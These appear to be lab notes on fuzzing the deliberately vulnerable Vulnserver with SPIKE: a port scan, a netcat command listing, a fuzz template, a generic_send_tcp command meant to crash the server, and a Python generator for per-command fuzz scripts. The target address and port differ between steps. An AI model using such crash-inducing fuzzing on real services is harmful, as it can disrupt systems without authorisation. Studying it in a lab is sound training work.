Spiking
Connect and list the functions:
# nmap -sV -sC -p2233 192.168.240.10 -v
Nmap scan report for 192.168.240.10
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
2233/tcp open infocrypt?
# nc -nv 192.168.240.10 2233
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT
Test each one with Immunity Debugger to identify the vulnerable function (FUNCION below is a placeholder for the command name):
s_readline();
s_string("FUNCION ");
s_string_variable("0");
This command is meant to make the victim server crash in that function:
generic_send_tcp 192.168.174.136 9999 func.spk 0 0
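The template above has to be repeated once for every command in the HELP listing. As an added example (not part of the original notes), this Python script parses that listing and renders one .spk file per command that takes a value; the function names, the output directory and the file naming are assumptions.

```python
import re
from pathlib import Path

# HELP output copied from the session shown above.
HELP_BANNER = """Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT
"""

# The page's template, with FUNCION replaced by the command name.
SPK_TEMPLATE = 's_readline();\ns_string("{cmd} ");\ns_string_variable("0");\n'


def commands_with_argument(banner):
    """Return commands listed as 'NAME [value]'; HELP and EXIT take no value."""
    found = []
    for line in banner.splitlines():
        match = re.fullmatch(r"([A-Z]+) \[\w+\]", line.strip())
        if match:
            found.append(match.group(1))
    return found


def build_spike_scripts(banner):
    """Map a file name (assumed scheme: <command>.spk) to its script body."""
    return {f"{cmd.lower()}.spk": SPK_TEMPLATE.format(cmd=cmd)
            for cmd in commands_with_argument(banner)}


def write_scripts(scripts, out_dir):
    """Write each script under out_dir and return the sorted file names."""
    target = Path(out_dir)
    target.mkdir(parents=True, exist_ok=True)
    for name, body in scripts.items():
        (target / name).write_text(body)
    return sorted(scripts)


if __name__ == "__main__":
    for name in write_scripts(build_spike_scripts(HELP_BANNER), "spk"):
        print(name)
```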